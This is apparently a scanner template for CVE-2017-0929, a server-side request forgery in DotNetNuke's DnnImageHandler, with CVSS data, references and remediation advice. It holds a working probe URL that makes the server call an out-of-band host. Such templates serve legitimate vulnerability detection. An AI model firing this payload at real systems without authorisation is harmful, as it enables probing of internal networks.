id: CVE-2017-0929 info: name: DotNetNuke (DNN) ImageHandler <9.2.0 - Server-Side Request Forgery author: charanrayudu,meme-lord severity: high description: DotNetNuke (aka DNN) before 9.2.0 suffers from a server-side request forgery vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources. remediation: | Upgrade DotNetNuke (DNN) ImageHandler to version 9.2.0 or above. reference: - https://hackerone.com/reports/482634 - https://nvd.nist.gov/vuln/detail/CVE-2017-0929 - https://github.com/dnnsoftware/Dnn.Platform/commit/d3953db85fee77bb5e6383747692c507ef8b94c3 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-0929 cwe-id: CWE-918 epss-score: 0.03588 epss-percentile: 0.90561 cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dnnsoftware product: dotnetnuke tags: dnn,dotnetnuke,hackerone,cve,cve2017,oast,ssrf http: - method: GET path: - '{{BaseURL}}/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}' matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: status status: - 500 # digest: 4a0a00473045022041e412d38916f25cc674ace5a9c0a942b938df713713a167b2f133d5ac592046022100b47b48abc282fbe732e71d512d8b5626bbe30afee3c24045b3a47ba6b1ddb6c0:922c64590222798bb761d5b6d8e72950